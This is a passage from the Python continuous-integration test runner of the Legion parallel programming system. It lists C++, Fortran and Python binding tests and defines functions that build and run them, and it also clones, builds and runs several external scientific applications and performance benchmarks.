[]],\n    # Comment this test out until it works everywhere\n    #['examples/implicit_top_task/implicit_top_task', []],\n\n    # Tests\n    ['test/rendering/rendering', ['-i', '2', '-n', '64', '-ll:cpu', '4']],\n    ['test/legion_stl/test_stl', []],\n\n    # Tutorial/realm\n    ['tutorial/realm/hello_world/realm_hello_world', []],\n    ['tutorial/realm/machine_model/realm_machine_model', []],\n    ['tutorial/realm/events/realm_events', []],\n    ['tutorial/realm/region_instances/realm_region_instances', []],\n    ['tutorial/realm/deferred_allocation/realm_deferred_allocation', []],\n    ['tutorial/realm/index_space_ops/realm_index_space_ops', []],\n    ['tutorial/realm/index_space_copy_fill/realm_index_space_copy_fill', []],\n    ['tutorial/realm/reductions/realm_reductions', []],\n    ['tutorial/realm/barrier/realm_barrier', []],\n    ['tutorial/realm/subgraph/realm_subgraph', []],\n    ['tutorial/realm/reservation/realm_reservation', []],\n    ['tutorial/realm/completion_queue/realm_completion_queue', []],\n    ['tutorial/realm/profiling/realm_profiling', []],\n]\n\nif 'USE_CUDA' in os.environ and os.environ['USE_CUDA'] == '1':\n    legion_cxx_tests += [\n        ['tutorial/realm/cuda_interop/realm_cuda_interop', []],\n    ]\n\nlegion_cxx_prof_tests = [\n    ['examples/provenance/provenance', []],\n    ['test/gather_perf/gather_perf', ['-m', '1']],\n    ['test/gather_perf/gather_perf', ['-m', '2']],\n    ['test/gather_perf/gather_perf', ['-m', '3']],\n    ['test/gather_perf/gather_perf', ['-m', '4']],\n    ['test/gather_perf/gather_perf', ['-m', '5']],\n    ['test/gather_perf/gather_perf', ['-m', '6']],\n    ['test/gather_perf/gather_perf', ['-m', '7']],\n]\n\nlegion_fortran_tests = [\n    ['tutorial/fortran/00_hello_world/hello_world_fortran', []],\n    ['tutorial/fortran/01_tasks_and_futures/tasks_and_futures_fortran', []],\n    ['tutorial/fortran/02_index_tasks/index_tasks_fortran', []],\n    ['tutorial/fortran/03_physical_regions/physical_regions_fortran', []],\n    ['tutorial/fortran/04_privileges_accessor/privileges_accessor_fortran', []],\n    ['tutorial/fortran/05_privileges_raw_ptr/privileges_raw_ptr_fortran', []],\n    ['tutorial/fortran/06_partitioning/partitioning_fortran', []],\n    ['tutorial/fortran/07_partitioning_fortran_task/partitioning_fortran_task_fortran', []],\n    ['tutorial/fortran/08_multiple_partitions/multiple_partitions_fortran', []],\n    ['tutorial/fortran/09_region_2d/region_2d_fortran', []],\n    ['tutorial/fortran/10_attach_array/attach_array_fortran', []],\n]\n\nif platform.system() != 'Darwin':\n    legion_cxx_tests += [\n        # FIXME: Fails non-deterministically on Mac OS: https://github.com/StanfordLegion/legion/issues/213\n        ['test/attach_file_mini/attach_file_mini', []],\n    ]\n\nlegion_network_cxx_tests = [\n    # Examples\n    ['examples/mpi_interop/mpi_interop', []],\n\n    # Tests\n    ['test/bug954/bug954', ['-ll:rsize', '1024']],\n]\n\nlegion_openmp_cxx_tests = [\n    # Examples\n    ['examples/omp_saxpy/omp_saxpy', ['-ll:ocpu', '1']],\n]\n\nlegion_kokkos_cxx_tests = [\n    # Examples\n    ['examples/kokkos_saxpy/kokkos_saxpy', []],\n]\n\nlegion_python_cxx_tests = [\n    # Bindings\n    ['bindings/python/legion_python', ['examples/domain.py', '-ll:py', '1', '-ll:cpu', '0']],\n    ['bindings/python/legion_python', ['examples/domain_point.py', '-ll:py', '1', '-ll:cpu', '0']],\n    ['bindings/python/legion_python', ['examples/domain_transform.py', '-ll:py', '1', '-ll:cpu', '0']],\n    ['bindings/python/legion_python', ['examples/future.py', '-ll:py', '1', '-ll:cpu', '0']],\n    ['bindings/python/legion_python', ['examples/hello.py', '-ll:py', '1', '-ll:cpu', '0']],\n    ['bindings/python/legion_python', ['examples/import.py', 
'-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/index_launch.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/ispace.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/method.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/must_epoch.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/partition.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/partition_by_field.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/partition_by_image.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/partition_by_image_range.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/partition_by_preimage.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/partition_by_preimage_range.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/partition_by_restriction.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/reduction.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/region.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/region_fields.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/return_region.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/single_launch.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/struct.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/trace.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/tunable.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['examples/types.py', '-ll:py', '1', '-ll:cpu', '0']],\n\n ['bindings/python/legion_python', ['tests/fail/privileges.py', '-ll:py', '1', '-ll:cpu', '0']],\n\n ['bindings/python/legion_python', ['tests/pass/copy.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['tests/pass/empty_region.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['tests/pass/print_once.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['tests/pass/privileges.py', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['tests/pass/no_access.py', '-ll:py', '1', '-ll:cpu', '0']],\n\n # Tests for Package Import\n ['bindings/python/legion_python', ['-m', 'tests.pass.test_package1.a.b.c', '-ll:py', '1', '-ll:cpu', '0']],\n ['bindings/python/legion_python', ['-m', 'tests.pass.test_package2.a.b.c', '-ll:py', '1', '-ll:cpu', '0']],\n\n # Examples\n ['examples/python_interop/python_interop', ['-ll:py', '1']],\n\n # Tests\n ['test/python_bindings/python_bindings', ['-ll:py', '1', '-ll:cpu', '0']],\n]\n\nlegion_hdf_cxx_tests = [\n # Tests\n ['test/hdf_attach_subregion_parallel/hdf_attach_subregion_parallel', ['-ll:cpu', '4']],\n]\n\nif platform.system() != 'Darwin':\n legion_hdf_cxx_tests += [\n # FIXME: Fails non-deterministically on Mac OS: https://github.com/StanfordLegion/legion/issues/213\n ['examples/attach_file/attach_file', ['-h', 'data.h5', '-d', '/path/to/data']],\n ]\n\ndef get_legion_cxx_perf_tests(nodes, cores_per_node):\n return [\n # Circuit: Heavy Compute\n ['examples/circuit/circuit',\n ['-l', '10', '-p', 
str(cores_per_node * nodes), '-npp', '2500', '-wpp', '10000',\n '-ll:csize', '8192', '-ll:cpu', str(cores_per_node)]],\n\n # Circuit: Light Compute\n ['examples/circuit/circuit',\n ['-l', '10', '-p', '100', '-npp', '2', '-wpp', '4', '-ll:cpu', '2']],\n ]\n\ndef get_regent_perf_tests(nodes, cores_per_node):\n return [\n # Circuit: Heavy Compute\n ['language/examples/circuit_sparse.rg',\n ['-l', '10', '-p', str(nodes * cores_per_node), '-npp', '2500', '-wpp', '10000',\n '-ll:csize', '8192', '-ll:cpu', str(cores_per_node), '-fflow-spmd-shardsize', str(cores_per_node)]],\n\n # Circuit: Light Compute\n ['language/examples/circuit_sparse.rg',\n ['-l', '10', '-p', '100', '-npp', '2', '-wpp', '4', '-ll:cpu', '2',\n '-fflow-spmd-shardsize', '2']],\n\n # PENNANT: Heavy Compute\n ['language/examples/pennant_fast.rg',\n ['pennant.tests/sedovbig3x30/sedovbig.pnt',\n '-seq_init', '0', '-par_init', '1', '-print_ts', '1', '-prune', '5',\n '-npieces', str(nodes * cores_per_node), '-numpcx', '1', '-numpcy', str(nodes * cores_per_node),\n '-ll:csize', '8192', '-ll:cpu', str(cores_per_node), '-fflow-spmd-shardsize', str(cores_per_node),\n '-fvectorize-unsafe', '1']],\n ]\n\nclass TestTimeoutException(Exception):\n pass\n\ndef sigalrm_handler(signum, frame):\n raise TestTimeoutException\n\ndef cmd(command, env=None, cwd=None, timelimit=None):\n print(' '.join(command))\n sys.stdout.flush() # python 2 doesn't have flush option in print\n if timelimit:\n child = subprocess.Popen(command, env=env, cwd=cwd)\n signal.signal(signal.SIGALRM, sigalrm_handler)\n signal.alarm(timelimit)\n try:\n ret = child.wait()\n signal.alarm(0) # disable alarm\n signal.signal(signal.SIGALRM, signal.SIG_DFL)\n if ret:\n raise subprocess.CalledProcessError(ret, command)\n return ret\n except TestTimeoutException:\n child.kill()\n raise # re-raise\n else:\n return subprocess.check_call(command, env=env, cwd=cwd)\n\ndef run_test_regent(launcher, root_dir, tmp_dir, bin_dir, env, thread_count):\n cmd([sys.executable, os.path.join(root_dir, 'language/travis.py')], env=env)\n\ndef run_cxx(tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit):\n prev_built_dir = None\n for test_file, test_flags in tests:\n test_dir = os.path.dirname(os.path.join(root_dir, test_file))\n if bin_dir:\n test_path = os.path.join(bin_dir, os.path.basename(test_file))\n else:\n test_path = os.path.join(root_dir, test_file)\n # build if this is in a new directory\n if test_dir != prev_built_dir:\n # and clean up the previous directory to keep disk usage down\n if prev_built_dir:\n cmd(['find', prev_built_dir , '-type', 'f', '(', '-name', '*.a', '-o', '-name', os.path.basename(test_file), ')', '-exec', 'rm', '-v', '{}', ';'])\n cmd([make_exe, '-C', test_dir, '-j', str(thread_count)], env=env)\n prev_built_dir = test_dir\n cmd(launcher + [test_path] + flags + test_flags, env=env, cwd=test_dir, timelimit=timelimit)\n if prev_built_dir:\n cmd(['find', prev_built_dir , '-type', 'f', '(', '-name', '*.a', '-o', '-name', os.path.basename(test_file), ')', '-exec', 'rm', '-v', '{}', ';'])\n\ndef run_regent(tests, flags, launcher, root_dir, env, thread_count, timelimit):\n for test_file, test_flags in tests:\n test_dir = os.path.dirname(os.path.join(root_dir, test_file))\n test_path = os.path.join(root_dir, test_file)\n cmd(launcher + [test_path] + flags + test_flags, env=env, cwd=test_dir, timelimit=timelimit)\n\ndef precompile_regent(tests, flags, launcher, root_dir, env, thread_count):\n exe_tests = []\n for test_file, test_flags in tests:\n test_dir = 
os.path.dirname(os.path.join(root_dir, test_file))\n test_path = os.path.join(root_dir, test_file)\n\n exe = os.path.splitext(test_path)[0] + '.exe'\n env = dict(list(env.items()) + [('OBJNAME', exe)])\n\n cmd(launcher + [test_path] + flags + test_flags, env=env, cwd=test_dir)\n\n exe_tests.append([exe, test_flags])\n return exe_tests\n\ndef run_test_legion_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n if env['USE_CUDA'] == '1' or env['USE_HIP'] == '1':\n flags.extend(['-ll:gpu', '1'])\n if (env['USE_KOKKOS'] == '1') and (env['USE_OPENMP'] == '1'):\n flags.extend(['-ll:ocpu', '1', '-ll:onuma', '0' ])\n run_cxx(legion_cxx_tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n\ndef run_test_legion_network_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n if env['USE_CUDA'] == '1' or env['USE_HIP'] == '1':\n flags.extend(['-ll:gpu', '1'])\n if (env['USE_KOKKOS'] == '1') and (env['USE_OPENMP'] == '1'):\n flags.extend(['-ll:ocpu', '1', '-ll:onuma', '0' ])\n run_cxx(legion_network_cxx_tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n\ndef run_test_legion_openmp_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n if env['USE_CUDA'] == '1' or env['USE_HIP'] == '1':\n flags.extend(['-ll:gpu', '1'])\n if (env['USE_KOKKOS'] == '1') and (env['USE_OPENMP'] == '1'):\n flags.extend(['-ll:ocpu', '1', '-ll:onuma', '0' ])\n run_cxx(legion_openmp_cxx_tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n\ndef run_test_legion_kokkos_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n if env['USE_CUDA'] == '1' or env['USE_HIP'] == '1':\n flags.extend(['-ll:gpu', '1'])\n if (env['USE_KOKKOS'] == '1') and (env['USE_OPENMP'] == '1'):\n flags.extend(['-ll:ocpu', '1', '-ll:onuma', '0' ])\n run_cxx(legion_kokkos_cxx_tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n\ndef run_test_legion_python_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n # Hack: legion_python currently requires the module name to come first\n flags = [] # ['-logfile', 'out_%.log']\n python_dir = os.path.join(root_dir, 'bindings', 'python')\n # Hack: Fix up the environment so that Python can find all the examples.\n env = dict(list(env.items()) + [\n ('PYTHONPATH', ':'.join([python_dir])),\n ('LD_LIBRARY_PATH', ':'.join([python_dir])),\n ])\n # Clean up around python because we are going to make shared objects\n # which is not something that anyone else does\n cmd([make_exe, '-C', python_dir, 'clean'], env=env)\n run_cxx(legion_python_cxx_tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n cmd([make_exe, '-C', python_dir, 'clean'], env=env)\n\ndef run_test_legion_jupyter_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n # Hack: legion_python currently requires the module name to come first\n flags = [] # ['-logfile', 'out_%.log']\n python_dir = os.path.join(root_dir, 'bindings', 'python')\n # Hack: Fix up the environment so that Python can find all the examples.\n env = dict(list(env.items()) + [\n ('PYTHONPATH', ':'.join([python_dir])),\n ('LD_LIBRARY_PATH', ':'.join([python_dir])),\n ])\n # Clean up around python because we are going to make shared objects\n # which is not something that anyone else does\n cmd([make_exe, '-C', python_dir, 
'clean'], env=env)\n cmd([make_exe, '-C', python_dir, '-j', str(thread_count)], env=env)\n jupyter_dir = os.path.join(root_dir, 'jupyter_notebook')\n jupyter_install_cmd = [sys.executable, './install_jupyter.py', '--legion-prefix', python_dir, '--verbose']\n cmd(jupyter_install_cmd, env=env, cwd=jupyter_dir)\n jupyter_test_file = os.path.join(root_dir, 'jupyter_notebook', 'ci_test.py')\n jupyter_test_cmd = ['jupyter', 'run', '--kernel', 'legion_kernel_nocr', jupyter_test_file]\n cmd(jupyter_test_cmd, env=env)\n canonical_jupyter_test_file = os.path.join(root_dir, 'jupyter_notebook', 'test_canonical.py')\n canonical_jupyter_test_cmd = ['jupyter', 'run', '--kernel', 'python3', canonical_jupyter_test_file]\n cmd(canonical_jupyter_test_cmd, env=env)\n canonical_python_test_cmd = [sys.executable, canonical_jupyter_test_file]\n cmd(canonical_python_test_cmd, env=env)\n cmd([make_exe, '-C', python_dir, 'clean'], env=env)\n\ndef run_test_legion_prof_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-lg:prof','1', '-lg:prof_logfile', 'prof_%.gz']\n from tools.test_prof import run_prof_test\n for test_file, test_flags in legion_cxx_prof_tests:\n prof_test = [[test_file, test_flags],]\n run_cxx(prof_test, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n test_file_path = Path(os.path.join(root_dir, test_file))\n test_dir = test_file_path.parent.absolute()\n run_prof_test(root_dir, test_dir, tmp_dir)\n\ndef run_test_legion_hdf_cxx(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n if env['USE_CUDA'] == '1' or env['USE_HIP'] == '1':\n flags.extend(['-ll:gpu', '1'])\n if (env['USE_KOKKOS'] == '1') and (env['USE_OPENMP'] == '1'):\n flags.extend(['-ll:ocpu', '1', '-ll:onuma', '0' ])\n run_cxx(legion_hdf_cxx_tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n\ndef run_test_legion_fortran(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n if env['USE_CUDA'] == '1' or env['USE_HIP'] == '1':\n flags.extend(['-ll:gpu', '1'])\n run_cxx(legion_fortran_tests, flags, launcher, root_dir, bin_dir, env, thread_count, timelimit)\n\ndef run_test_fuzzer(launcher, root_dir, tmp_dir, bin_dir, env, thread_count):\n env = dict(list(env.items()) + [('WARN_AS_ERROR', '0')])\n fuzz_dir = os.path.join(tmp_dir, 'fuzz-tester')\n cmd(['git', 'clone', 'https://github.com/StanfordLegion/fuzz-tester', fuzz_dir])\n # TODO; Merge deppart branch into master after this makes it to stable Legion branch\n cmd(['git', 'checkout', 'deppart'], cwd=fuzz_dir)\n cmd(['python3', 'main.py'], env=env, cwd=fuzz_dir)\n\ndef run_test_realm(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n test_dir = os.path.join(root_dir, 'test/realm')\n cmd([make_exe, '-C', test_dir, 'DEBUG=0', 'clean'], env=env)\n cmd([make_exe, '-C', test_dir, 'DEBUG=0', '-j', str(thread_count), 'build'], env=env)\n cmd([make_exe, '-C', test_dir, 'DEBUG=0', 'run_all'], env=env, timelimit=timelimit)\n\ndef run_test_external1(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n\n # Realm perf test (move back to perf test when integrated with perf.py)\n perf_dir = os.path.join(root_dir, 'test/performance/realm')\n cmd([make_exe, '-C', perf_dir, 'DEBUG=0', 'clean_all'], env=env)\n cmd([make_exe, '-C', perf_dir, 'DEBUG=0', 'build_all'], env=env)\n cmd([make_exe, '-C', perf_dir, 'DEBUG=0', 'RUNMODE=short', 'run_all'], env=env, 
timelimit=timelimit)\n\n # Fast Direct Solver\n # Contact: Chao Chen \n solver_dir = os.path.join(tmp_dir, 'fastSolver2')\n cmd(['git', 'clone', 'https://github.com/Charles-Chao-Chen/fastSolver2.git', solver_dir])\n # cmd(['git', 'checkout', '4c7a59de63dd46a0abcc7f296fa3b0f511e5e6d2', ], cwd=solver_dir)\n solver = [[os.path.join(solver_dir, 'spmd_driver/solver'),\n ['-machine', '1', '-core', '8', '-mtxlvl', '6', '-ll:cpu', '8', '-ll:csize', '1024']]]\n run_cxx(solver, flags, launcher, root_dir, None, env, thread_count, timelimit)\n\n # Parallel Research Kernels: Stencil\n # Contact: Wonchan Lee \n prk_dir = os.path.join(tmp_dir, 'prk')\n cmd(['git', 'clone', 'https://github.com/magnatelee/PRK.git', prk_dir])\n # This uses a custom Makefile that requires additional\n # configuration. Rather than go to that trouble it's easier to\n # just use a copy of the standard Makefile template.\n stencil_dir = os.path.join(prk_dir, 'LEGION', 'Stencil')\n stencil_env = dict(list(env.items()) + [\n ('OUTFILE', 'stencil'),\n ('GEN_SRC', 'stencil.cc'),\n ('CXXFLAGS', (env['CXXFLAGS'] if 'CXXFLAGS' in env else '') +\n ' -DRADIUS=2 -DRESTRICT_KEYWORD -DDISABLE_BARRIER_MIGRATION'),\n ])\n makefile = os.path.join(root_dir, 'apps/Makefile.template')\n cmd([make_exe, '-f', makefile, '-C', stencil_dir, '-j', str(thread_count)], env=stencil_env)\n stencil = os.path.join(stencil_dir, 'stencil')\n # HACK: work around stencil mapper issue with -ll:ext_sysmem 0\n cmd([stencil, '4', '10', '1000', '-ll:ext_sysmem', '0'], timelimit=timelimit)\n\n # SNAP\n # Contact: Mike Bauer \n snap_dir = os.path.join(tmp_dir, 'snap')\n cmd(['git', 'clone', 'https://github.com/StanfordLegion/Legion-SNAP.git', snap_dir])\n # This can't handle flags before application arguments, so place\n # them after.\n snap = [[os.path.join(snap_dir, 'src/snap'),\n [os.path.join(snap_dir, 'input/mms.in')] + flags]]\n run_cxx(snap, [], launcher, root_dir, None, env, thread_count, timelimit)\n\n # Soleil-X\n # Contact: Manolis Papadakis \n soleil_dir = os.path.join(tmp_dir, 'soleil-x')\n cmd(['git', 'clone', 'https://github.com/stanfordhpccenter/soleil-x.git', soleil_dir])\n soleil_env = dict(list(env.items()) + [\n ('LEGION_DIR', root_dir),\n ('SOLEIL_DIR', soleil_dir),\n ('CC', 'gcc'),\n ])\n cmd([make_exe, '-C', os.path.join(soleil_dir, 'src')], env=soleil_env)\n # FIXME: Actually run it\n\ndef run_test_external2(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n # HTR\n # Contact: Mario Di Renzo \n htr_dir = os.path.join(tmp_dir, 'htr')\n # cmd(['git', 'clone', 'https://github.com/stanfordhpccenter/HTR-solver.git', htr_dir])\n # NOTE: the legion-ci branch currently requires g++ (not clang) to build and\n # is REALLY slow unless you set DEBUG=0\n cmd(['git', 'clone', '-b', 'legion-ci', 'git@gitlab.com:mario.direnzo/Prometeo.git', htr_dir])\n htr_env = dict(list(env.items()) + [\n ('LEGION_DIR', root_dir),\n ('LD_LIBRARY_PATH', os.path.join(root_dir, 'bindings', 'regent')),\n ('HTR_DIR', htr_dir),\n ('CC', 'gcc'),\n ('CXX', 'g++'),\n ('DEBUG', '0'),\n ])\n cmd(['python3', os.path.join(htr_dir, 'unitTests', 'testAll.py')], env=htr_env)\n\n # TaskAMR\n # Contact: Jonathan Graham \n task_amr_dir = os.path.join(tmp_dir, 'task_amr')\n cmd(['git', 'clone', 'https://github.com/lanl/TaskAMR.git', task_amr_dir])\n task_amr_env = dict(list(env.items()) + [\n ('LEGION_ROOT', root_dir),\n ])\n cmd([make_exe, '-C', os.path.join(task_amr_dir)], env=task_amr_env)\n\n # Barnes-Hut\n # Contact: Haithem Turki \n barnes_hut_dir = 
os.path.join(tmp_dir, 'barnes_hut')\n cmd(['git', 'clone', 'https://github.com/StanfordLegion/barnes-hut.git', barnes_hut_dir])\n regent_path = os.path.join(root_dir, 'language', 'regent.py')\n cmd([sys.executable, regent_path, 'hdf5_converter.rg',\n '-i', 'input/bodies-16384-blitz.csv',\n '-o', 'bodies-16384-blitz.h5',\n '-n', '16384'],\n cwd=barnes_hut_dir,\n env=env,\n timelimit=timelimit)\n # work around search path that doesn't include bindings/regent\n for hdr in ('legion_defines.h', 'realm_defines.h'):\n os.symlink(os.path.join(root_dir, 'bindings', 'regent', hdr),\n os.path.join(root_dir, 'runtime', hdr))\n cmd([sys.executable, regent_path, 'barnes_hut.rg',\n '-i', 'bodies-16384-blitz.h5',\n '-n', '16384'],\n cwd=barnes_hut_dir,\n env=env,\n timelimit=timelimit)\n\ndef run_test_private(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n flags = ['-logfile', 'out_%.log']\n\n # MiniAero\n # Contact: Wonchan Lee \n miniaero_dir = os.path.join(tmp_dir, 'miniaero-spmd')\n cmd(['git', 'clone', '-b', 'spmd_flattened_superblocks',\n 'git@github.com:magnatelee/miniaero-spmd.git', miniaero_dir])\n cmd([make_exe, '-C', miniaero_dir, '-j', str(thread_count)], env=env,\n cwd=miniaero_dir)\n for test in ['3D_Sod', '3D_Sod_2nd_Order'\n # These tests take a long time so skip them by default.\n # , 'FlatPlate', 'Ramp'\n ]:\n test_dir = os.path.join(miniaero_dir, 'tests', test)\n cmd([os.path.join(test_dir, 'test.sh')], env=env, cwd=test_dir, timelimit=timelimit)\n\n # PENNANT\n # Contact: Galen Shipman \n pennant_dir = os.path.join(tmp_dir, 'pennant')\n cmd(['git', 'clone', '-b', 'spmdv2',\n 'git@github.com:gshipman/pennant-legion.git', pennant_dir])\n # This uses a custom Makefile that requires additional\n # configuration. Rather than go to that trouble it's easier to\n # just use a copy of the standard Makefile template.\n pennant_env = dict(list(env.items()) + [\n ('OUTFILE', 'pennant'),\n ('GEN_SRC', ' '.join(glob.glob(os.path.join(pennant_dir, 'src/*.cc')))),\n ('CXXFLAGS', (env['CXXFLAGS'] if 'CXXFLAGS' in env else '') +\n ' -std=c++11 -Wno-sign-compare -Wno-unknown-pragmas -Wno-unused-variable' +\n ' -D__STDC_FORMAT_MACROS -DDISABLE_BARRIER_MIGRATION'),\n ('WARN_AS_ERROR', '0'),\n ])\n makefile = os.path.join(root_dir, 'apps/Makefile.template')\n # Previous build uses -DASSUME_UNALLOCABLE. 
Clean first to get a fresh environment.\n    cmd([make_exe, '-f', makefile, '-C', pennant_dir, 'clean'], env=pennant_env)\n    cmd([make_exe, '-f', makefile, '-C', pennant_dir, '-j', str(thread_count)], env=pennant_env)\n    pennant = os.path.join(pennant_dir, 'pennant')\n    cmd([pennant, str(app_cores), 'test/sedovsmall/sedovsmall.pnt', '-ll:cpu', str(app_cores)],\n        cwd=pennant_dir,\n        timelimit=timelimit)\n\n\ndef run_test_ctest(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, timelimit):\n    build_dir = os.path.join(tmp_dir, 'build')\n    args = ['ctest', '--output-on-failure']\n    # do not run tests in parallel if they use GPUs - might not all fit\n    if env['USE_CUDA'] != '1' and env['USE_HIP'] != '1':\n        args.extend(['-j', str(thread_count)])\n    if timelimit:\n        args.extend(['--timeout', str(timelimit)])\n    cmd(args,\n        env=env,\n        cwd=build_dir)\n\ndef run_test_legion_prof_mypy(root_dir):\n    mypy_cmd = [\n        \"mypy\",\n        \"--disallow-any-unimported\",\n        \"--disallow-any-explicit\",\n        \"--disallow-untyped-defs\",\n        \"--disallow-incomplete-defs\",\n        \"--warn-redundant-casts\",\n        \"--warn-unused-ignores\",\n        os.path.join(root_dir, 'tools', 'legion_prof.py'),\n    ]\n    print('Running mypy test:', mypy_cmd)\n    cmd(mypy_cmd)\n\ndef hostname():\n    return subprocess.check_output(['hostname']).strip()\n\ndef git_commit_id(repo_dir):\n    return subprocess.check_output(\n        ['git', 'rev-parse', 'HEAD'], cwd=repo_dir).strip()\n\ndef git_branch_name(repo_dir):\n    proc = subprocess.Popen(\n        ['git', 'symbolic-ref', '--short', 'HEAD'], cwd=repo_dir,\n        stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n    output, errors = proc.communicate()\n    if proc.returncode == 0:\n        return output.strip()\n    return None\n\ndef run_test_perf_one_configuration(launcher, root_dir, tmp_dir, bin_dir, env, thread_count, nodes, timelimit):\n    flags = ['-logfile', 'out_%.log']\n\n    # for backward-compatibility, use app_cores if PERF_CORES_PER_NODE is not specified\n    cores_per_node = int(os.environ.get('PERF_CORES_PER_NODE', app_cores))\n\n    legion_cxx_perf_tests = get_legion_cxx_perf_tests(nodes, cores_per_node)\n    regent_perf_tests = get_regent_perf_tests(nodes, cores_per_node)\n\n    # Regent needs special flags when in precompile mode\n    precompile = os.environ.get('PERF_PRECOMPILE_REGENT') == '1'\n\n    # Performance test configuration:\n    metadata = {\n        'host': (os.environ['CI_RUNNER_DESCRIPTION']\n                 if 'CI_RUNNER_DESCRIPTION' in os.environ else hostname()),\n        'nodes': nodes,\n        'commit': (os.environ['CI_BUILD_REF'] if 'CI_BUILD_REF' in os.environ\n                   else git_commit_id(root_dir)),\n        'branch': (os.environ['CI_BUILD_REF_NAME'] if 'CI_BUILD_REF_NAME' in os.environ\n                   else git_branch_name(root_dir)),\n    }\n    cxx_measurements = {\n        # Hack: Use the command name as the benchmark name.\n        'benchmark': {\n            'type': 'argv',\n            'index': 0,\n            'filter': 'basename',\n        },\n        # Capture command line arguments following flags.\n        'argv': {\n            'type': 'argv',\n            'start': 1 + len(flags),\n        },\n        # Record running time in seconds.\n        'time_seconds': {\n            'type': 'regex',\n            'pattern': r'^ELAPSED TIME\\s*=\\s*(.*) s$',\n            'multiline': True,\n        }\n    }\n    regent_measurements = {\n        # Hack: Use the command name as the benchmark name.\n        'benchmark': {\n            'type': 'argv',\n            'index': 1,\n            'filter': 'basename',\n        },\n        # Capture command line arguments following flags.\n        'argv': {\n            'type': 'argv',\n            'start': 2,# + len(flags), # FIXME: Skipping flags, see below.\n        },\n        # Record running time in seconds.\n        'time_seconds': {\n            'type': 'command',\n            'args': [\n                os.path.join(root_dir, 
'language/scripts/summarize.py'),\n                '--machine-readable', '-',\n            ],\n        }\n    }\n    env = dict(list(env.items()) + [\n        ('PERF_OWNER', 'StanfordLegion'),\n        ('PERF_REPOSITORY', 'perf-data'),\n        ('PERF_METADATA', json.dumps(metadata)),\n    ])\n    cxx_env = dict(list(env.items()) + [\n        ('PERF_MEASUREMENTS', json.dumps(cxx_measurements)),\n        # Launch through perf.py\n        ('PERF_LAUNCHER', ' '.join(launcher)),\n        ('LAUNCHER', ''),\n    ])\n    regent_env = dict(list(env.items()) + [\n        ('PERF_MEASUREMENTS', json.dumps(regent_measurements)),\n        # Launch through regent.py\n        ('PERF_LAUNCHER', ' '.join(launcher) if precompile else ''),\n        ('LAUNCHER', '' if precompile else ' '.join(launcher)),\n    ])\n\n    # Build Regent first to avoid recompiling later.\n    cmd([sys.executable, os.path.join(root_dir, 'language/travis.py'), '--install-only'], env=env)\n\n    # Run Legion C++ performance tests.\n    runner = os.path.join(root_dir, 'perf.py')\n    run_cxx(legion_cxx_perf_tests, flags, [runner], root_dir, bin_dir, cxx_env, thread_count, timelimit)\n\n    # Run Regent performance tests.\n    regent_path = os.path.join(root_dir, 